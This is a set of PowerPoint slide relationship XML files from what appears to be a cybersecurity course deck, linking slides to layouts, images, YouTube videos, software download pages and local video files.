<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><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2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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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88.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2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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image174.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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slide" Target="slide88.xml"/><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12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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image182.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide1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84.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide131.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.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slide" Target="slide88.xml"/><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33.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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88.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36.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image197.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide137.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13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slide" Target="slide8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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.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slide" Target="slide88.xml"/><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41.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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88.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43.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image207.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image209.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image208.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide144.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image213.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image215.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide145.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><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46.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image223.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image218.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image221.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image219.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide147.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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image226.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image225.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14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88.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49.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:test01@10.10.1.14" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image230.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.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15.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slide" Target="slide88.xml"/><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51.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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image233.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image232.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide152.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide154.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide153.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide87.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide153.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image234.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide152.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1.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide152.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide155.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slide" Target="slide152.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slide" Target="slide152.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slide" Target="slide159.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide158.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15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slide" Target="slide157.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slide" Target="slide157.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16.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slide" Target="slide157.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide182.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide162.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide175.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="../Content/sy110/CyberDept/sy110/calendar.php-94.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide171.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide166.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16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slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide163.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><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237.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image241.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><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39.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image238.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide165.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.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slide" Target="slide161.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide167.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image242.jpe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slide" Target="slide161.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slide" Target="slide16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slide" Target="slide161.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slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide172.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><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slide" Target="slide161.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slide" Target="slide161.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slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide176.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><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slide" Target="slide161.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slide" Target="slide161.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hyperlink" Target="https://www.youtube.com/watch?v=o4dCzqy1JrY" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image247.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image246.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image245.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.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slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image250.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image249.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide181.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image252.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image251.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18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slide" Target="slide161.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image91.jpeg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image93.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide183.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.xml"/><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slide" Target="slide161.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hyperlink" Target="https://www.youtube.com/watch?v=fDXQYezdcIQ" TargetMode="External"/><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hyperlink" Target="https://www.youtube.com/watch?v=jZPudR4pWxM" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MA6ugSrB8eY" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide188.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=ynrsAtAlHqo" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=GisH2IQgob8" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51060;&#46976;&#44284;%20&#48513;&#54620;&#51012;%20&#44277;&#44201;&#54616;&#44592;%20&#50948;&#54620;%20&#48120;&#44397;&#51032;%20&#49324;&#51060;&#48260;%20&#54644;&#52964;%20&#50977;&#49457;%20%5b&#49800;&#54140;&#54253;&#53444;%5d.mp4"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50689;&#49345;/&#48513;&#54620;%20&#53076;&#47196;&#45208;%20&#51228;&#51312;&#49324;%20&#44277;&#44201;.mp4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=IS3UpC121bI" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/320%20&#49324;&#51060;&#48260;&#53580;&#47084;.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/Imitation%20Game%20-%20&#50640;&#45768;&#44536;&#47560;%20&#54644;&#46021;%20&#51109;&#47732;.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b&#50549;&#52964;&amp;&#47532;&#54252;&#53944;%5d%20&#36557;%20&#45236;&#48512;&#47581;%202&#45380;&#44036;%20&#50808;&#48512;%20&#51217;&#49549;&#8230;&#48372;&#50504;%20&#8216;&#44396;&#47693;&#8217;.mp4" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51453;&#44592;&#51204;&#50640;%20&#50508;&#50500;&#50556;%20&#54624;%20&#50669;&#49324;,%20&#48120;&#46300;&#50920;&#51060;%20&#54644;&#51204;.mp4" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide189.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15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25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186.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide86.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36.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide35.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.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3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide27.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide25.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.python.org/downloads" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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 Target="slide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide161.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slide" Target="slide2.xml"/><Relationship Id="rId9"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 Target="slide2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 Target="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slide" Target="slide24.xml"/><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 Target="slide2.xml"/><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 Id="rId9"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slide" Target="slide24.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hyperlink" Target="https://docs.microsoft.com/ko-KR/windows/wsl/wsl2-kernel" TargetMode="Externa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slide" Target="slide24.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image65.png"/></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slide" Target="slide24.xml"/><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 Target="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hyperlink" Target="https://hub.docker.com/editions/community/docker-ce-desktop-windows"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77.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide57.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide37.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slide" Target="slide36.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image72.jpe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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide51.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide56.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide55.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49.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide54.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide48.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide53.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide47.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide52.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.xml"/></Relationships>
</file>

